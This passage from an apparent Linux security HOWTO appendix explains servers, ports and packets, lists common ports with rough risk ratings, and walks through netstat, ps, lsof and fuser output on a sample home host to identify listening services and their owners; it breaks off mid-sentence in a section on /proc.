    can't already know something you have never used. Understood. But in the
    process of learning, learn how to do things the right way, not the
    easiest way. There is several decades of history behind "the right way"
    of doing things. This has stood the test of time. What may seem
    unnecessary or burdensome now, will make sense in due time.

    Be familiar with whatever services you are running, and the implications
    these services might have to the overall health of your system if
    something does go wrong. Read what you can, and ask questions. Don't run
    something as a service "just because I can", or because the installer put
    it there. You can't start out being an experienced System Administrator
    clearly. But you can work to learn enough about your own system, that you
    are in control. This is one thing that separates *nix from MS systems: we
    can never be in complete control with MS, but we can with *nix.
    Conversely, if something bad happens, we often have no one else to blame.


-----------------------------------------------------------------------------
8. Appendix

8.1. Servers, Ports, and Packets

Let's take a quick, non-technical look at some networking concepts, and how
they can potentially impact our own security. We don't need to know much
about networking, but a general idea of how things work is certainly going to
help us with firewalls and other related issues.

As you may have noticed Linux is a very network oriented Operating System.
Much is done by connecting to "servers" of one type or another -- X servers,
font servers, print servers, etc.

Servers provide "services", which provide various capabilities, both to the
local system and potentially other remote systems. The same server generally
provides both functionalities. Some servers work quietly behind the scenes,
and others are more interactive by nature. We may only be aware of a print
server when we need to print something, but it is there running, listening,
and waiting for connection requests whether we ever use it or not (assuming
of course we have it enabled). A typical Linux installation will have many,
many types of servers available to it. Default installations often will turn
some of these "on".

And even if we are not connected to a real network all the time, we are still
"networked" so to speak. Take our friendly local X server for instance. We
may tend to think of this as just providing a GUI interface, which is only
true to a point. It does this by "serving" to client applications, and thus
is truly a server. But X Windows is also capable of serving remote clients
over a network -- even large networks like the Internet. Though we probably
don't really want to be doing this ;-)

And yes, if you are not running a firewall or have not taken other
precautions, and are connected to the Internet, it is quite possible that
someone -- anyone -- could connect to your X server. X11 "listens" on TCP
"port" 6000 by default. This principle applies to most other servers as well
-- they can be easily connected to, unless something is done to restrict or
prevent connections.

In TCP/IP (Transmission Control Protocol/Internet Protocol) networks like we
are talking about with Linux and the Internet, every connected computer has a
unique "IP Address". Think of this like a phone number. You have a phone
number, and in order to call someone else, you have to know that phone
number, and then dial it. The phone numbers have to be unique for the system
to work. IP address are generally expressed as "dotted quad" notation, e.g.
152.19.254.81.

On this type of network, servers are said to "listen". This means that they
have a "port" opened, and are awaiting incoming connections to that port.
Connections may be local, as is typically the case with our X server, or
remote -- meaning from another computer "somewhere". So servers "listen" on a
specific "port" for incoming connections. Most servers have a default port,
such as port 80 for web servers. Or 6000 for X11. See /etc/services for a
list of common ports and their associated service.

The "port" is actually just an address in the kernel's networking stack, and
is a method that TCP, and other protocols, use to organize connections and
the exchange of data between computers. There are total of 65,536 TCP and UDP
ports available, though usually only a relatively few of these are used at
any one time. These are classified as "privileged", those ports below 1024,
and "unprivileged", 1024 and above. Most servers use the privileged ports.

Only one server may listen on, or "bind" to, a port at a time. Though that
server may well be able to open multiple connections via that one port.
Computers talk to each other via these "port" connections. One computer will
open a connection to a "port" on another computer, and thus be able to
exchange data via the connection that has been established between their
respective ports.

Getting back to the phone analogy, and stretching it a bit, think of calling
a large organization with a complex phone system. The organization has many
"departments": sales, shipping, billing, receiving, customer service, R&D,
etc. Each department has it's own "extension" number. So the shipping
department might be extension 21, the sales might be department 80 and so on.
The main phone number is the IP Address, and the department's extension is
the port in this analogy. The "department's" number is always the same when
we call. And generally they can handle many simultaneous incoming calls.

The data itself is contained in "packets", which are small chunks of data,
generally 1500 bytes or less each. Packets are used to control and organize
the connection, as well as carry data. There are different types of packets.
Some are specifically used for controlling the connection, and then some
packets carry our data as their payload. If there is a lot of data, it will
be broken up into multiple packets which is almost always how it works. The
packets will be transmitted one at a time, and then "re-assembled" at the
other end. One web page for instance, will take many packets to transmit --
maybe hundreds or even thousands. This all happens very quickly and
transparently.

We can see a typical connection between two computers in this one line
excerpt from netstat output:

+---------------------------------------------------------------------------+
| tcp    30    0 169.254.179.139:1359    18.29.1.67:21      CLOSE_WAIT      |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The interesting part is the IP addresses and ports in the fourth and fifth
columns. The port is the number just to the right of the colon. The left side
of the colon is the IP address of each computer. The fourth column is the
local address, or our end of the connection. In the example, 169.254.179.139
is the IP address assigned by my ISP. It is connected to port 21 (FTP) on
18.29.1.67, which is rpmfind.net. This is just after an FTP download from
rpmfind.net. Note that while I am connected to their FTP server on their port
21, the port on my end that is used by my FTP client is 1359. This is a
randomly assigned "unprivileged" port, used for my end of the two-way
"conversation". The data moves in both directions: me:port#1359 <-> them:port
#21. The FTP protocol is actually a little more complicated than this, but we
won't delve into the finer points here. The CLOSE_WAIT is the TCP state of
the connection at this particular point in time. Eventually the connection
will close completely on both ends, and netstat will not show anything for
this.

The "unprivileged" port that is used for my end of the connection, is
temporary and is not associated with a locally running server. It will be
closed by the kernel when the connection is terminated. This is quite
different than the ports that are kept open by "listening" servers, which are
permanent and remain "open" even after a remote connection is terminated.

So to summarize using the above example, we have client (me) connecting to a
server (rpmfind.net), and the connection is defined and controlled by the
respective ports on either end. The data is transmitted and controlled by
packets. The server is using a "privileged" port (i.e. a port below number
1024) which stays open listening for connections. The "unprivileged" port
used on my end by my client application is temporary, is only opened for the
duration of the connection, and only responds to the server's port at the
other end of the connection. This type of port is not vulnerable to attacks
or break-ins generally speaking. The server's port is vulnerable since it
remains open. The administrator of the FTP server will need to take
appropriate precautions that his server is secure. Other Internet
connections, such as to web servers or mail servers, work similar to the
above example, though the server ports are different. SMTP mail servers use
port 25, and web servers typically use port 80. See the Ports section for
other commonly used ports and services.

One more point on ports: ports are only accessible if there is something
listening on that port. No one can force a port open if there is no service
or daemon listening there, ready to handle incoming connection requests. A
closed port is a totally safe port.

And a final point on the distinction between clients and servers. The example
above did not have a telnet or ftp server in the LISTENER section in the
netstat example above. In other words, no such servers were running locally.
You do not need to run a telnet or ftp server daemon in order to connect to
somebody else's telnet or ftp server. These are only for providing these
services to others that would be making connections to you. Which you don't
really want to be doing in most cases. This in no way effects the ability to
use telnet and ftp client software.
-----------------------------------------------------------------------------

8.2. Common Ports

A quick run down of some commonly seen and used ports, with the commonly
associated service name, and risk factor. All have some risk. It is just that
some have historically had more exploits than others. That is how they are
evaluated below, and not necessarily to be interpreted as whether any given
service is safe or not.

1-19, assorted protocols, many of which are antiquated, and probably none of
which are needed on a modern system. If you don't know what any of these are,
then you definitely don't need them. The echo service (port 7) should not be
confused with the common ping program. Leave all these off.

20 - FTP-DATA. "Active" FTP connections use two ports: 21 is the control
port, and 20 is where the data comes through. Passive FTP does not use port
20 at all. Low risk, but see below.

21 - FTP server port, aka File Transfer Protocol. A well entrenched protocol
for transferring files between systems. Very high risk, and maybe the number
one crack target.

22 - SSH (Secure Shell), or sometimes PCAnywhere. Low to moderate risk (yes
there are exploits even against so called "secure" services).

23 - Telnet server. For LAN use only. Use ssh instead in non-secure
environments. Moderate risk.

25 - SMTP, Simple Mail Transfer Protocol, or mail server port, used for
sending outgoing mail, and transferring mail from one place to another.
Moderate risk. This has had a bad history of exploits, but has improved
lately.

37 - Time service. This is the built-in inetd time service. Low risk. For LAN
use only.

53 - DNS, or Domain Name Server port. Name servers listen on this port, and
answer queries for resolving host names to IP addresses. High Risk.

67 (UDP) - BOOTP, or DHCP, server port. Low risk. If using DHCP on your LAN,
this does not need to be exposed to the Internet.

68 (UDP) - BOOTP, or DHCP, client port. Low risk.

69 - tftp, or Trivial File Transfer Protocol. Extremely insecure. LAN only,
if really, really needed.

79 - Finger, used to provide information about the system, and logged in
users. Low risk as a crack target, but gives out way too much information and
should not be run.

80 - WWW or HTTP standard web server port. The most commonly used service on
the Internet. Low risk.

98 - Linuxconf web access administrative port. LAN only, if really needed at
all.

110 - POP3, aka Post Office Protocol, mail server port. POP mail is mail that
the user retrieves from a remote system. Low risk.

111 - sunrpc (Sun Remote Procedure Call), or portmapper port. Used by NFS
(Network File System), NIS (Network Information Service), and various related
services. Sounds dangerous and is high risk. LAN use only. A favorite crack
target.

113 - identd, or auth, server port. Used, and sometimes required, by some
older style services (like SMTP and IRC) to validate the connection. Probably
not needed in most cases. Low risk, but could give an attacker too much
information about your system.

119 -- nntp or news server port. Low risk.

123 - Network Time Protocol for synchronizing with time servers where a high
degree of accuracy is required. Low risk, but probably not required for most
users. rdate makes an easier and more secure way of updating the system
clock. And then inetd's built in time service for synchronizing LAN systems
is another option.

137-139 - NetBios (SMB) services. Mostly a Windows thing. Low risk on Linux,
but LAN use only. 137 is a very commonly seen port attempt. A rather
obnoxious protocol from Redmond that generates a lot of "noise", much of
which is harmless.

143 - IMAP, Interim Mail Access Protocol. Another mail retrieval protocol.
Low to moderate risk.

161 - SNMP, Simple Network Management Protocol. More commonly used in routers
and switches to monitor statistics and vital signs. Not needed for most of
us, and low risk.

177 - XDMCP, the X Display Management Control Protocol for remote connections
to X servers. Low risk, but LAN only is recommended.

443 - HTTPS, a secure HTTP (WWW) protocol in fairly wide use. Low risk.

465 - SMTP over SSL, secure mail server protocol. Low risk.

512 (TCP) - exec is how it shows in netstat. Actually the proper name is
rexec, for Remote Execution. Sounds dangerous, and is. High risk, LAN only if
at all.

512 (UDP) - biff, a mail notification protocol. Low risk, LAN only.

513 - login, actually rlogin, aka Remote Login. No relation to the standard /
bin/login that we use every time we log in. Sounds dangerous, and is. High
risk, and LAN only if really needed.

514 (TCP) - shell is the nickname, and how netstat shows it. Actually, rsh is
the application for "Remote Shell". Like all the "r" commands, this is a
throw back to kindler, gentler times. Very insecure, so high risk, and LAN
only usage, if at all.

514 (UDP) - syslog daemon port, only used for remote logging purposes. The
average user does not need this. Probably low risk, but definitely LAN only
if really required.

515 - lp or print server port. High risk, and LAN only of course. Someone on
the other side of the world does not want to use your printer for it's
intended purpose!

587 - MSA, or "submission", the Mail Submission Agent protocol. A new mail
handling protocol supported by most MTA's (mail servers). Low risk.

631 - the CUPS (print daemon) web management port. LAN only, low risk.

635 - mountd, part of NFS. LAN use only.

901 - SWAT, Samba Web Administration Tool port. LAN only.

993 - IMAP over SSL, secure IMAP mail service. Very low risk.

995 - POP over SSL, secure POP mail service. Very low risk.

1024 - This is the first "unprivileged" port, which is dynamically assigned
by the kernel to whatever application requests it. This can be almost
anything. Ditto for ports just above this.

1080 - Socks Proxy server. A favorite crack target.

1243 - SubSeven Trojan. Windows only problem.

1433 - MS SQL server port. A sometimes target. N/A on Linux.

2049 - nfsd, Network File Service Daemon port. High risk, and LAN usage only
is recommended.

3128 - Squid proxy server port. Low risk, but for most should be LAN only.

3306 - MySQL server port. Low risk, but for most should be LAN only.

5432 - PostgreSQL server port. LAN only, relatively low risk.

5631 (TCP), 5632 (UDP) - PCAnywhere ports. Windows only. PCAnywhere can be
quite "noisy", and broadcast wide address ranges.

6000 - X11 TCP port for remote connections. Low to moderate risk, but again,
this should be LAN only. Actually, this can include ports 6000-6009 since X
can support multiple displays and each display would have its own port. ssh's
X11Forwarding will start using ports at 6010.

6346 - gnutella.

6667 - ircd, Internet Relay Chat Daemon.

6699 - napster.

7100-7101 - Some font servers use these ports. Low risk, but LAN only.

8000 and 8080 - common web cache and proxy server ports. LAN only.

10000 - webmin, a web based system administration utility. Low risk at this
point.

27374 - SubSeven, a commonly probed for Windows only Trojan. Also, 1243.

31337 - Back Orifice, another commonly probed for Windows only Trojan.

More services and corresponding port numbers can be found in /etc/services.
Also, the "official" list is [http://www.iana.org/assignments/port-numbers]
http://www.iana.org/assignments/port-numbers.

A great analysis of what probes to these and other ports might mean from
Robert Graham: [http://www.linuxsecurity.com/resource_files/firewalls/
firewall-seen.html] http://www.linuxsecurity.com/resource_files/firewalls/
firewall-seen.html. A very good reference.

Another point here, these are the standard port designations. There is no law
that says any service has to run on a specific port. Usually they do, but
certainly they don't always have to.

Just a reminder that when you see these types of ports in your firewall logs,
it is not anything to go off the deep end about. Not if you have followed
Steps 1-3 above, and verified your firewall works. You are fairly safe. Much
of this traffic may be "stray bullets" too -- Internet background noise,
misconfigured clients or routers, noisy Windows stuff, etc.
-----------------------------------------------------------------------------

8.3. Netstat Tutorial

8.3.1. Overview

netstat is a very useful utility for viewing the current state of your
network status -- what servers are listening for incoming connections, what
interfaces they listen on, who is connected to us, who we are connect to, and
so on. Take a look at the man page for some of the many command line options.
We'll just use a relative few options here.

As an example, let's check all currently listening servers and active
connections for both TCP and UDP on our hypothetical host, bigcat. bigcat is
a home desktop installation, with a DSL Internet connection in this example.
bigcat has two ethernet cards: one for the external connection to the ISP,
and one for a small LAN with an address of 192.168.1.1.

+--------------------------------------------------------------------------------+
|                                                                                |
|$ netstat -tua                                                                  |
|Active Internet connections (servers and established)                           |
|Proto Recv-Q Send-Q Local Address           Foreign Address         State       |
|tcp        0      0 *:printer               *:*                     LISTEN      |
|tcp        0      0 bigcat:8000             *:*                     LISTEN      |
|tcp        0      0 *:time                  *:*                     LISTEN      |
|tcp        0      0 *:x11                   *:*                     LISTEN      |
|tcp        0      0 *:http                  *:*                     LISTEN      |
|tcp        0      0 bigcat:domain           *:*                     LISTEN      |
|tcp        0      0 bigcat:domain           *:*                     LISTEN      |
|tcp        0      0 *:ssh                   *:*                     LISTEN      |
|tcp        0      0 *:631                   *:*                     LISTEN      |
|tcp        0      0 *:smtp                  *:*                     LISTEN      |
|tcp        0      1 dsl-78-199-139.s:1174   64.152.100.93:nntp      SYN_SENT    |
|tcp        0      1 dsl-78-199-139.s:1175   64.152.100.93:nntp      SYN_SENT    |
|tcp        0      1 dsl-78-199-139.s:1173   64.152.100.93:nntp      SYN_SENT    |
|tcp        0      0 dsl-78-199-139.s:1172   207.153.203.114:http    ESTABLISHED |
|tcp        1      0 dsl-78-199-139.s:1199   www.xodiax.com:http     CLOSE_WAIT  |
|tcp        0      0 dsl-78-199-139.sd:http  63.236.92.144:34197     TIME_WAIT   |
|tcp      400      0 bigcat:1152             bigcat:8000             CLOSE_WAIT  |
|tcp     6648      0 bigcat:1162             bigcat:8000             CLOSE_WAIT  |
|tcp      553      0 bigcat:1164             bigcat:8000             CLOSE_WAIT  |
|udp        0      0 *:32768                 *:*                                 |
|udp        0      0 bigcat:domain           *:*                                 |
|udp        0      0 bigcat:domain           *:*                                 |
|udp        0      0 *:631                   *:*                                 |
|                                                                                |
|                                                                                |
+--------------------------------------------------------------------------------+

This output probably looks very different from what you get on your own
system. Notice the distinction between "Local Address" and "Foreign Address",
and how each includes a corresponding port number (or service name if
available) after the colon. "Local Address" is our end of the connection. The
first group with LISTEN in the far right hand column are services that are
running on this system. These are servers that are running in the background
on bigcat, and "listen" for incoming connections. So they have a port opened,
and this is where they "listen". These connections might come from the local
system (i.e. bigcat itself), or remote systems. This is very important
information to have! The others just below this are connections that have
been established from this system to other systems. The respective
connections are in varying states as indicated by the key words in the last
column. Those with no key word in the last column at the end are servers
responding to UDP connections. UDP is a different protocol from TCP
altogether, but is used for some types of low priority network traffic.

Now, the same thing with the "-n" flag to suppress converting to "names" so
we can actually see the port numbers:

+-----------------------------------------------------------------------------+
|$ netstat -taun                                                              |
|Active Internet connections (servers and established)                        |
|Proto Recv-Q Send-Q Local Address           Foreign Address      State       |
|tcp        0      0 0.0.0.0:515             0.0.0.0:*            LISTEN      |
|tcp        0      0 127.0.0.1:8000          0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:37              0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:6000            0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:80              0.0.0.0:*            LISTEN      |
|tcp        0      0 192.168.1.1:53          0.0.0.0:*            LISTEN      |
|tcp        0      0 127.0.0.1:53            0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:22              0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:631             0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:25              0.0.0.0:*            LISTEN      |
|tcp        0      1 169.254.179.139:1174    64.152.100.93:119    SYN_SENT    |
|tcp        0      1 169.254.179.139:1175    64.152.100.93:119    SYN_SENT    |
|tcp        0      1 169.254.179.139:1173    64.152.100.93:119    SYN_SENT    |
|tcp        0      0 169.254.179.139:1172    207.153.203.114:80   ESTABLISHED |
|tcp        1      0 169.254.179.139:1199    216.26.129.136:80    CLOSE_WAIT  |
|tcp        0      0 169.254.179.139:80      63.236.92.144:34197  TIME_WAIT   |
|tcp      400      0 127.0.0.1:1152          127.0.0.1:8000       CLOSE_WAIT  |
|tcp     6648      0 127.0.0.1:1162          127.0.0.1:8000       CLOSE_WAIT  |
|tcp      553      0 127.0.0.1:1164          127.0.0.1:8000       CLOSE_WAIT  |
|udp        0      0 0.0.0.0:32768           0.0.0.0:*                        |
|udp        0      0 192.168.1.1:53          0.0.0.0:*                        |
|udp        0      0 127.0.0.1:53            0.0.0.0:*                        |
|udp        0      0 0.0.0.0:631             0.0.0.0:*                        |
|                                                                             |
|                                                                             |
+-----------------------------------------------------------------------------+

Let's look at the first few lines of this in detail. On line one,

+----------------------------------------------------------------------------+
| tcp        0      0 0.0.0.0:515            0.0.0.0:*          LISTEN       |
|                                                                            |
|                                                                            |
+----------------------------------------------------------------------------+

"Local Address" is 0.0.0.0, meaning "all" interfaces that are available. The
local port is 515, or the standard print server port, usually owned by the
lpd daemon. You can find a listing of common service names and corresponding
ports in the file /etc/services.

The fact that it is listening on all interfaces is significant. In this case,
that would be lo (localhost), eth0, and eth1. Printer connections could
conceivably be made over any of these interfaces. Should a user on this
system bring up a PPP connection, then the print daemon would be listening on
that interface (ppp0) as well. The "Foreign Address" is also 0.0.0.0, meaning
from "anywhere".

It is also worth noting here, that even though this server is telling the
kernel to listen on all interfaces, the netstat output does not reflect
whether there may be a firewall in place that may be filtering incoming
connections. We just can't tell that at this point. Obviously, for certain
servers, this is very desirable. Nobody outside your own LAN has any reason
whatsoever to connect to your print server port for instance.

Line two is a little different:

+----------------------------------------------------------------------------+
| tcp        0      0 127.0.0.1:8000         0.0.0.0:*          LISTEN       |
|                                                                            |
|                                                                            |
+----------------------------------------------------------------------------+

Notice the "Local Address" this time is localhost's address of 127.0.0.1.
This is very significant as only connections local to this machine will be
accepted. So only bigcat can connect to bigcat's TCP port 8000. The security
implications should be obvious. Not all servers have configuration options
that allow this kind of restriction, but it is a very useful feature for
those that do. Port 8000 in this example, is owned by the web proxy
Junkbuster.

With the next three entries, we are back to listening on all available
interfaces:

+-----------------------------------------------------------------------------+
| tcp        0      0 0.0.0.0:37             0.0.0.0:*           LISTEN       |
| tcp        0      0 0.0.0.0:6000           0.0.0.0:*           LISTEN       |
| tcp        0      0 0.0.0.0:80             0.0.0.0:*           LISTEN       |
|                                                                             |
|                                                                             |
+-----------------------------------------------------------------------------+

Looking at /etc/services, we can tell that port 37 is a "time" service, which
is a time server. 6000 is X11, and 80 is the standard port for HTTP servers
like Apache. There is nothing really unusual here as these are all readily
available services on Linux.

The first two above are definitely not the kind of services you'd want just
anyone to connect to. These should be firewalled so that all outside
connections are refused. Again, we can't tell from this output whether any
firewall is in place, much less how effectively implemented it may be.

The web server on port 80 is not a huge security risk by itself. HTTP is a
protocol that is often open to all comers. For instance, if we wanted to host
our own home page, Apache can certainly do this for us. It is also possible
to firewall this off, so that it is for use only to our LAN clients as part
of an Intranet. Obviously too, if you do not have a good justification for
running a web server, then it should be disabled completely.

The next two lines are interesting:

+-----------------------------------------------------------------------------+
| tcp        0      0 192.168.1.1:53         0.0.0.0:*           LISTEN       |
| tcp        0      0 127.0.0.1:53           0.0.0.0:*           LISTEN       |
|                                                                             |
|                                                                             |
+-----------------------------------------------------------------------------+

Again notice the "Local Address" is not 0.0.0.0. This is good! The port this
time is 53, or the DNS port used by nameserver daemons like named. But we see
the nameserver daemon is only listening on the lo interface (localhost), and
the interface that connects bigcat to the LAN. So the kernel only allows
connections from localhost, and the LAN. There will be no port 53 available
to outside connections at all. This is a good example of how individual
applications can sometimes be securely configured. In this case, we are
probably looking at a caching DNS server since a real nameserver that is
responsible for handling DNS queries would have to have port 53 open to the
world. This is a security risk and requires special handling.

The last three LISTENER entries:

+-----------------------------------------------------------------------------+
| tcp        0      0 0.0.0.0:22             0.0.0.0:*           LISTEN       |
| tcp        0      0 0.0.0.0:631            0.0.0.0:*           LISTEN       |
| tcp        0      0 0.0.0.0:25             0.0.0.0:*           LISTEN       |
|                                                                             |
|                                                                             |
+-----------------------------------------------------------------------------+

These are back to listening on all available interfaces. Port 22 is sshd, the
Secure Shell server daemon. This is a good sign! Notice that the service for
port 631 does not have a service name if we look at the output in the first
example. This might be a clue that something unusual is going on here. (See
the next section for the answer to this riddle.) And lastly, port 25, the
standard port for the SMTP mail daemon. Most Linux installations probably
will have an SMTP daemon running, so this is not necessarily unusual. But is
it necessary?

The next grouping is established connections. For our purposes the state of
the connection as indicated by the last column is not so important. This is
well explained in the man page.

+-------------------------------------------------------------------------------+
| tcp        0      1 169.254.179.139:1174    64.152.100.93:119    SYN_SENT     |
| tcp        0      1 169.254.179.139:1175    64.152.100.93:119    SYN_SENT     |
| tcp        0      1 169.254.179.139:1173    64.152.100.93:119    SYN_SENT     |
| tcp        0      0 169.254.179.139:1172    207.153.203.114:80   ESTABLISHED  |
| tcp        1      0 169.254.179.139:1199    216.26.129.136:80    CLOSE_WAIT   |
| tcp        0      0 169.254.179.139:80      63.236.92.144:34197  TIME_WAIT    |
| tcp      400      0 127.0.0.1:1152          127.0.0.1:8000       CLOSE_WAIT   |
| tcp     6648      0 127.0.0.1:1162          127.0.0.1:8000       CLOSE_WAIT   |
| tcp      553      0 127.0.0.1:1164          127.0.0.1:8000       CLOSE_WAIT   |
|                                                                               |
|                                                                               |
+-------------------------------------------------------------------------------+

There are nine total connections here. The first three is our external
interface connecting to a remote host on their port 119, the standard NNTP
(News) port. There are three connections here to the same news server.
Apparently the application is multi-threaded, as it is trying to open
multiple connections to the news server. The next two entries are connections
to a remote web server as indicated by the port 80 after the colon in the
fifth column. Probably a pretty common looking entry for most of us. But the
one just after is reversed and has the port 80 in the fourth column, so this
is someone that has connected to bigcat's web server via its external,
Internet-side interface. The last three entries are all connections from
localhost to localhost. So we are connecting to ourselves here. Remembering
from above that port 8000 is bigcat's web proxy, this is a web browser that
is connected to the locally running proxy. The proxy then will open an
external connection of its own, which probably is what is going on with lines
four and five.

Since we gave netstat both the -t and -u options, we are getting both the TCP
and UDP listening servers. The last few lines are the UDP ones:

+----------------------------------------------------------------------------+
| udp        0      0 0.0.0.0:32768          0.0.0.0:*                       |
| udp        0      0 192.168.1.1:53         0.0.0.0:*                       |
| udp        0      0 127.0.0.1:53           0.0.0.0:*                       |
| udp        0      0 0.0.0.0:631            0.0.0.0:*                       |
|                                                                            |
|                                                                            |
+----------------------------------------------------------------------------+

The last three entries have ports that are familiar from the above
discussion. These are servers that are listening for both TCP and UDP
connections. Same servers in this case, just using two different protocols.
The first one on local port 32768 is new, and does not have a service name
available to it in /etc/services. So at first glance this should be
suspicious and pique our curiosity. See the next section for the explanation.

Can we draw any conclusions from this hypothetical situation? For the most
part, these look to be pretty normal looking network services and connections
for Linux. There does not seem to be an unduly high number of servers running
here, but that by itself does not mean much since we don't know if all these
servers are really required or not. We know that netstat can not tell us if
any of these are effectively firewalled, so there is no way to say how secure
all this might be. We also don't really know if all the listening services
are really required by the owner here. That is something that varies widely
from installation to installation. Does bigcat even have a printer attached
for instance? Presumably it does, or this is a completely unnecessary risk.
-----------------------------------------------------------------------------

8.3.2. Port and Process Owners

We've learned a lot about what is going on with bigcat's networking from the
above section. But suppose we see something we don't recognize and want to
know what started that particular service? Or we want to stop a particular
server and it is not obvious from the above output?

The -p option should give us the process's PID and the program name that
started the process in the last column. Let's look at the TCP servers again
(with first three columns cropped for spacing). We'll have to run this as
root to get all the available information:

+----------------------------------------------------------------------------+
|# netstat -tap                                                              |
|Active Internet connections (servers and established)                       |
|  Local Address           Foreign Address      State       PID/Program name |
|  *:printer               *:*                  LISTEN       988/inetd       |
|  bigcat:8000             *:*                  LISTEN       1064/junkbuster |
|  *:time                  *:*                  LISTEN       988/inetd       |
|  *:x11                   *:*                  LISTEN       1462/X          |
|  *:http                  *:*                  LISTEN       1078/httpd      |
|  bigcat:domain           *:*                  LISTEN       956/named       |
|  bigcat:domain           *:*                  LISTEN       956/named       |
|  *:ssh                   *:*                  LISTEN       972/sshd        |
|  *:631                   *:*                  LISTEN       1315/cupsd      |
|  *:smtp                  *:*                  LISTEN       1051/master     |
|                                                                            |
|                                                                            |
+----------------------------------------------------------------------------+

Some of these we already know about. But we see now that the printer daemon
on port 515 is being started via inetd with a PID of "988". inetd is a
special situation. inetd is often called the "super server", since it's main
role is to spawn sub-services. If we look at the first line, inetd is
listening on port 515 for printer services. If a connection comes for this
port, inetd intercepts it, and then will spawn the appropriate daemon, i.e.
the print daemon in this case. The configuration of how inetd handles this is
typically done in /etc/inetd.conf. This should tell us that if we want to
stop an inetd controlled server on a permanent basis, then we will have to
dig into the inetd (or perhaps xinetd) configuration. Also the time service
above is started via inetd as well. This should also tell us that these two
services can be further protected by tcpwrappers (discussed in Step 3 above).
This is one benefit of using inetd to control certain system services.

We weren't sure about the service on port 631 above since it did not have a
standard service name, which means it is something maybe unusual or off the
beaten path. Now we see it is owned by cupsd , which is one of several print
daemons available under Linux. This happens to be the web interface for
controlling the printer service. Something cupsd does that is indeed a little
different than other print servers.

The last entry above is the SMTP mail server on bigcat. Often, this is
sendmail with many distributions. But not in this case. The command is
"master", which may not ring any bells. Armed with the program name we could
go searching the filesystem with tools like the locate or find commands.
After we found it, we could then probably discern what package it belonged
to. But with the PID available now, we can look at ps output, and see if that
helps us any:

+---------------------------------------------------------------------------+
| $ /bin/ps ax |grep 1051 |grep -v grep                                     |
|  1051 ?        S        0:24 /usr/libexec/postfix/master                  |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

We took a shortcut here by combining ps with grep. It looks like that this
file belongs to postfix, which is indeed a mail server package comparable to
sendmail.

Running ps with the --forest flag (-f for short) can be helpful in
determining what processes are parent or child process or another process. An
edited example:

+---------------------------------------------------------------------------+
| $ /bin/ps -axf                                                            |
|  956 ?        S      0:00 named -u named                                  |
|  957 ?        S      0:00  \_ named -u named                              |
|  958 ?        S      0:46      \_ named -u named                          |
|  959 ?        S      0:47      \_ named -u named                          |
|  960 ?        S      0:00      \_ named -u named                          |
|  961 ?        S      0:11      \_ named -u named                          |
| 1051 ?        S      0:30 /usr/libexec/postfix/master                     |
| 1703 ?        S      0:00  \_ tlsmgr -l -t fifo -u -c                     |
| 1704 ?        S      0:00  \_ qmgr -l -t fifo -u -c                       |
| 1955 ?        S      0:00  \_ pickup -l -t fifo -c                        |
| 1863 ?        S      0:00  \_ trivial-rewrite -n rewrite -t unix -u -c    |
| 2043 ?        S      0:00  \_ cleanup -t unix -u -c                       |
| 2049 ?        S      0:00  \_ local -t unix                               |
| 2062 ?        S      0:00  \_ smtpd -n smtp -t inet -u -c                 |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

A couple of things to note here. We have two by now familiar daemons here:
named and postfix (smtpd). Both are spawning sub-processes. In the case of
named, what we are seeing is threads, various sub-processes that it always
spawns. Postfix is also spawning sub-processes, but not as "threads". Each
sub-process has its own specific task. It is worth noting that child
processes are dependent on the parent process. So killing the parent PID,
will in turn kill all child processes.

If all this has not shed any light, we might also try locate:

+---------------------------------------------------------------------------+
| $ locate /master                                                          |
| /etc/postfix/master.cf                                                    |
| /var/spool/postfix/pid/master.pid                                         |
| /usr/libexec/postfix/master                                               |
| /usr/share/vim/syntax/master.vim                                          |
| /usr/share/vim/vim60z/syntax/master.vim                                   |
| /usr/share/doc/postfix-20010202/html/master.8.html                        |
| /usr/share/doc/postfix-20010202/master.cf                                 |
| /usr/share/man/man8/master.8.gz                                           |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

find is perhaps the most flexible file finding utility, but doesn't use a
database the way locate does, so is much slower:

+---------------------------------------------------------------------------+
| $ find / -name master                                                     |
| /usr/libexec/postfix/master                                               |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

If lsof is installed, it is another command that is useful for finding who
owns processes or ports:

+---------------------------------------------------------------------------+
| # lsof -i :631                                                            |
| COMMAND  PID  USER    FD   TYPE DEVICE SIZE NODE NAME                     |
| cupsd   1315  root    0u   IPv4   3734       TCP *:631 (LISTEN)           |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

This is again telling us that the cupsd print daemon is the owner of port
631. Just a different way of getting at it. Yet one more way to get at this
is with fuser, which should be installed:

+---------------------------------------------------------------------------+
| # fuser -v -n tcp 631                                                     |
|                                                                           |
|                      USER        PID  ACCESS  COMMAND                     |
| 631/tcp              root       1315  f....   cupsd                       |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

See the man pages for fuser and lsof command syntax.

Another place to look for where a service is started, is in the init.d
directory, where the actual init scripts live (for SysVinit systems).
Something like ls -l /etc/init.d/, should give us a list of these. Often the
script name itself gives a hint as to which service(s) it starts, though it
may not necessarily exactly match the "Program Name" as provided by netstat.
Or we can use grep to search inside files and match a search pattern. Need to
find where rpc.statd is being started, and we don't see a script by this
name?

+---------------------------------------------------------------------------+
| # grep rpc.statd /etc/init.d/*                                            |
| /etc/init.d/nfslock: [ -x /sbin/rpc.statd ] || exit 0                     |
| /etc/init.d/nfslock:    daemon rpc.statd                                  |
| /etc/init.d/nfslock:    killproc rpc.statd                                |
| /etc/init.d/nfslock:    status rpc.statd                                  |
| /etc/init.d/nfslock:    /sbin/pidof rpc.statd >/dev/null 2>&1; STATD="$?" |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

We didn't really need all that information, but at least we see now exactly
which script is starting it. Remember too that not all services are started
this way. Some may be started via inetd, or xinetd.

The /proc filesystem also keeps everything we want to know about processes
that are running. We can query this to find out more information about each
process. Do you need to know the full path of the command that started a
process?

+-----------------------------------------------------------------------------+
